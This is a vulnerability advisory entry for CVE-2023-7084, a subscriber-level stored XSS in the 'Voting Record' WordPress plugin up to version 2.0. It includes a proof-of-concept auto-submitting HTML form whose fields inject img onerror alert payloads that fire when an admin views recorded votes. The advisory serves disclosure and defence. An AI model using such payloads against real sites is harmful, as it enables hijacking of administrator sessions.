Lucene search
Daniel RufWPEX-ID:5E51E239-919B-4E74-A7EE-195F3817F907HistoryJan 10, 2024 - 12:00 a.m.
Voting Record <= 2.0 - Subscriber+ Stored XSS
2024-01-1000:00:00
Daniel Ruf
26
stored xss
voting record
subscriber
html
admin privilege
Description The plugin is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks
Have a subscriber open an HTML file containing the following:
```
<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
<input type="text" name="bill" value="1">
<input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
<input type="text" name="vote" value="Yea">
<input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
<input type="text" name="date" value="2022-12-10">
<input type="text" name="result" value="pass">
<input type="text" name="tally" value="3">
<input type="text" name="record_vote" value="Save">
</form>
<script>
document.forms[0].submit();
</script>
```
See the XSS when logged in as an admin and viewing recorded votes.Related
cve
cve
CVE-2023-7084
2024-01-16 16:15:14
prion
prion
Cross site scripting
2024-01-16 16:15:00
wpvulndb
wpvulndb
Voting Record <= 2.0 - Subscriber+ Stored XSS
2024-01-10 00:00:00
cvelist
cvelist
CVE-2023-7084 Voting Record <= 2.0 - Subscriber+ Stored XSS
2024-01-16 15:57:03
nvd
nvd
CVE-2023-7084
2024-01-16 16:15:14
wordfence
wordfence
5.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.1%
Related for WPEX-ID:5E51E239-919B-4E74-A7EE-195F3817F907